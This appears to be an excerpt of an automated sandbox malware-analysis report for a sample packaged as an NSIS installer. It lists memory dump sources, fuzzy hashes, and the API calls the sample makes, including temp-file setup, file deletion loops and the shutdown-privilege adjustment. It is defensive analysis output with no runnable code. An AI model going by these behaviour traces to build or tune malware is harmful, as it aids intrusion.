                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c35d9f628fac451f7e728579ce667afa2601b8b72ab3494a08894d51d6038cc8
                                                                                                                • Instruction ID: 260a53b345d24ff2f4f56c8568e006fbc1e0f759cf5e21c522dc7566ae1dd7ac
                                                                                                                • Opcode Fuzzy Hash: c35d9f628fac451f7e728579ce667afa2601b8b72ab3494a08894d51d6038cc8
                                                                                                                • Instruction Fuzzy Hash: 1CD0A93014C2C82ECF0227B0A8691E83F26EB4720DF1800ECF48666A47CA92C5838F80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c5d985a192c7cfb6e973e5cac5ee9d61ba72c5ac93e38eb1c9e8bcd7baf1c81e
                                                                                                                • Instruction ID: 83d6b9c2c37c9a2b27584817642b63a91c88e5ff87754df6ff0961c4bc65b3ba
                                                                                                                • Opcode Fuzzy Hash: c5d985a192c7cfb6e973e5cac5ee9d61ba72c5ac93e38eb1c9e8bcd7baf1c81e
                                                                                                                • Instruction Fuzzy Hash: F1C08C302683048FE200AA1DC884B013BACFF85B04F6028E2F4048B622CB22FC004B09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717298092.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_160000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ec1174b1a3ce9096ce16e7e0d81505d29e95d4a38ff232d2c2d6b40c0f61510c
                                                                                                                • Instruction ID: 4be034cd58974d5d469fecb72f09ac89fdd42c25890bf9f02e0aef38fbde4605
                                                                                                                • Opcode Fuzzy Hash: ec1174b1a3ce9096ce16e7e0d81505d29e95d4a38ff232d2c2d6b40c0f61510c
                                                                                                                • Instruction Fuzzy Hash: 4FC012310553188FDA45E765DC46655373A77D05017808510A4051A56EDFB8595B4B91
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                                • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                • #17.COMCTL32(?,00000006,?,0000000A), ref: 0040353E
                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                • SHGetFileInfoW.SHELL32(004216E8,00000000,?,?,00000000), ref: 00403561
                                                                                                                • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,?,0000000A), ref: 00403576
                                                                                                                • CharNextW.USER32(00000000,00435000,?,00435000,00000000,?,00000006,?,0000000A), ref: 004035AE
                                                                                                                  • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                                  • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                • GetTempPathW.KERNEL32(?,00437800,?,00000006,?,0000000A), ref: 004036E8
                                                                                                                • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,?,0000000A), ref: 004036F9
                                                                                                                • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,?,0000000A), ref: 00403705
                                                                                                                • GetTempPathW.KERNEL32(?,00437800,00437800,\Temp,?,00000006,?,0000000A), ref: 00403719
                                                                                                                • lstrcatW.KERNEL32(00437800,Low,?,00000006,?,0000000A), ref: 00403721
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,?,0000000A), ref: 00403732
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,?,0000000A), ref: 0040373A
                                                                                                                • DeleteFileW.KERNEL32(00437000,?,00000006,?,0000000A), ref: 0040374E
                                                                                                                  • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                                • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403819
                                                                                                                • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040384D
                                                                                                                • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040385C
                                                                                                                • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403867
                                                                                                                • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403873
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,?,0000000A), ref: 0040388F
                                                                                                                • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?,?,00000006,?,0000000A), ref: 004038E9
                                                                                                                • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,?,0000000A), ref: 004038FD
                                                                                                                • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,?,0000000A), ref: 0040392A
                                                                                                                • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403959
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                • API String ID: 3441113951-334447862
                                                                                                                • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                                • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                                • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00404DEF
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00404E39
                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                • SetWindowLongW.USER32(?,?,004053C4), ref: 00404E65
                                                                                                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404E79
                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404EBF
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                • GetWindowLongW.USER32(?,?), ref: 00404FFD
                                                                                                                • SetWindowLongW.USER32(?,?,00000000), ref: 0040500B
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405193
                                                                                                                • SendMessageW.USER32(?,?,00000000,?), ref: 004051B7
                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                • String ID: $M$N
                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                                • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                                • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                                • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,00437800,75572EE0,00000000), ref: 00405B23
                                                                                                                • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B6B
                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B8E
                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B94
                                                                                                                • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405BA4
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                • String ID: 0WB$\*.*
                                                                                                                • API String ID: 2035342205-351390296
                                                                                                                • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                                • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                                • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                                • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0), ref: 00406736
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID: xgB
                                                                                                                • API String ID: 2295610775-399326502
                                                                                                                • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                                • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: B78
                                                                                                                • API String ID: 0-3762569330
                                                                                                                • Opcode ID: 142c95c5af9ea1cadb110eb9526e96d505e054b68582c1bb8f041cf7b5cfca39
                                                                                                                • Instruction ID: c2c2227d70bf63361ee48365bb3a312f354d20d123675c098752ea175b30de95
                                                                                                                • Opcode Fuzzy Hash: 142c95c5af9ea1cadb110eb9526e96d505e054b68582c1bb8f041cf7b5cfca39
                                                                                                                • Instruction Fuzzy Hash: 12627974E01228CFEB64DF65C884B99BBB2BF89301F5085EAD409A7355DB359E82CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5991db9bf79b898c487994f926aec8fbdc33e3d5392989a15e3235f295181b96
                                                                                                                • Instruction ID: 89d059613e75367b3996cf0373270997b0c7d66698f9cedbdbcb377cbe784167
                                                                                                                • Opcode Fuzzy Hash: 5991db9bf79b898c487994f926aec8fbdc33e3d5392989a15e3235f295181b96
                                                                                                                • Instruction Fuzzy Hash: 68C1E174E01218CFDB54DFA9C995B9DBBB2BF89304F6080A9D809AB355DB349E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 597cff12dfd2797bdd004a3660054554b3fd1d42dbd9957e089a32de99ece9ac
                                                                                                                • Instruction ID: ebc075e8fdf5aeb87270605a9410a2f72da11f6f5477d1f37e5dbff16d607624
                                                                                                                • Opcode Fuzzy Hash: 597cff12dfd2797bdd004a3660054554b3fd1d42dbd9957e089a32de99ece9ac
                                                                                                                • Instruction Fuzzy Hash: 02C1C174E01218CFDB54DFA9C994B9DBBB2BF89304F6080A9D809AB355DB359E81CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 720a74169d6b9235a4932410b0108bd9b788dd788bfc12b30f45337c13f6819c
                                                                                                                • Instruction ID: 5979019d2868ce1685c8ff5d7f3bd5bfc57a91353d2716ec6d524b07e28622f7
                                                                                                                • Opcode Fuzzy Hash: 720a74169d6b9235a4932410b0108bd9b788dd788bfc12b30f45337c13f6819c
                                                                                                                • Instruction Fuzzy Hash: 10C1BF74E01218CFDB54DFA9C994B9DBBB2BF89304F6081A9D409BB355DB359A81CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f1f7639cee7c04f950bf1181371caa90df57bd6f1881a6b3c667e8e76269a05
                                                                                                                • Instruction ID: c3fa623b7f4f968e475aa6de6a7bd5009d508fb56ab06c92012586839626813c
                                                                                                                • Opcode Fuzzy Hash: 0f1f7639cee7c04f950bf1181371caa90df57bd6f1881a6b3c667e8e76269a05
                                                                                                                • Instruction Fuzzy Hash: 36C1D174E01218CFDB54DFA9C994B9DBBB2BF89314F6080A9D409AB355DB359E81CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ef57820e2a507a445ee46fdd296c03b0d926fa0fcc5fe7857270d0dd5fdc3965
                                                                                                                • Instruction ID: 55ab87a08adc046905da9cc92df5a72afc5b11c75fa1118e3c5813cc3c3cbd12
                                                                                                                • Opcode Fuzzy Hash: ef57820e2a507a445ee46fdd296c03b0d926fa0fcc5fe7857270d0dd5fdc3965
                                                                                                                • Instruction Fuzzy Hash: CCC1C174E01218CFDB54DFA9C994B9DBBB2BF89304F6080A9D409AB355DB359E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 99a0b035b53bc63b83a3917014ed84d644609a5fea3dce54ecdc415c3531af3c
                                                                                                                • Instruction ID: 440a4a65d00ae2d89b01e99b07c0533c2822b2ae164be133f1ac076de3c041f5
                                                                                                                • Opcode Fuzzy Hash: 99a0b035b53bc63b83a3917014ed84d644609a5fea3dce54ecdc415c3531af3c
                                                                                                                • Instruction Fuzzy Hash: 47C1B374E01218CFDB54DFA9C994B9DBBB2BF89300F6080A9D809AB355DB355E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 47790db3d3fa88a5f107dae1376ef18719a67cb5b14c4ea752dda807d89efb28
                                                                                                                • Instruction ID: c38de2f31d5c261d968e468d6b1c0f229f174f7b79baa7f3afbcb713d756f7e9
                                                                                                                • Opcode Fuzzy Hash: 47790db3d3fa88a5f107dae1376ef18719a67cb5b14c4ea752dda807d89efb28
                                                                                                                • Instruction Fuzzy Hash: F6C1C274E01218CFDB54DFA5C995B9DBBB2BF89300F6080A9D409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 50e2c5644e9ebb80259e220c2073f35eea3d0e56a4c5be69beecf89760dad4e9
                                                                                                                • Instruction ID: 1d36591d7f57789bf62d367e3d8469cbccbbb1caa5c3d119b5c9fe070ccff6b8
                                                                                                                • Opcode Fuzzy Hash: 50e2c5644e9ebb80259e220c2073f35eea3d0e56a4c5be69beecf89760dad4e9
                                                                                                                • Instruction Fuzzy Hash: 19C1B074E01218CFDB54DFA5C995B9DBBB2BF89300F6080A9D809BB355DB359A82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f9abb72ec069899c6f7daf63e4782182f1122527f62cc8d6f55cdb35f548a6d5
                                                                                                                • Instruction ID: ce68ff68170c8ec76daa08046e9e7e842d0b9cc0f8319eb022eab06847d73ed8
                                                                                                                • Opcode Fuzzy Hash: f9abb72ec069899c6f7daf63e4782182f1122527f62cc8d6f55cdb35f548a6d5
                                                                                                                • Instruction Fuzzy Hash: ACC1B274E01218CFDB54DFA9C995B9DBBB2BF89300F6080A9D409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d44a8dcf79aacae764a86cf3ca40c7b97f009d05e3baff4b9d8163ada7d1117d
                                                                                                                • Instruction ID: f90738832d2cee536e44b55f42462c04c341cf5edc99c71f84023fcc9f339804
                                                                                                                • Opcode Fuzzy Hash: d44a8dcf79aacae764a86cf3ca40c7b97f009d05e3baff4b9d8163ada7d1117d
                                                                                                                • Instruction Fuzzy Hash: EBC1A274E01218CFEB54DFA5C995B9DBBB2BF89300F6081A9D409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 87b2138bf5790a368f8e8b9ecd128d6934c5ca4b0c516bb4cf805cac344ce080
                                                                                                                • Instruction ID: 688cba8d14255168d7672ce45e1798041ea9db617481fd21266869b8deabaa35
                                                                                                                • Opcode Fuzzy Hash: 87b2138bf5790a368f8e8b9ecd128d6934c5ca4b0c516bb4cf805cac344ce080
                                                                                                                • Instruction Fuzzy Hash: 44C1C274E01218CFDB54DFA5C995B9DBBB2BF89300F6080AAD409AB355DB359E86CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e66adcaf6fc48d7c4386590afd5e80d9860f4f64e839d8ed9c371a147177b725
                                                                                                                • Instruction ID: 1a3512378ed860808fa910eb8739dadab5be8f37b6b786221f917db6c33915fa
                                                                                                                • Opcode Fuzzy Hash: e66adcaf6fc48d7c4386590afd5e80d9860f4f64e839d8ed9c371a147177b725
                                                                                                                • Instruction Fuzzy Hash: 3BC1B374E01218CFDB54DFA9C994B9DBBB2BF89300F6080A9D409AB355DB359E82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
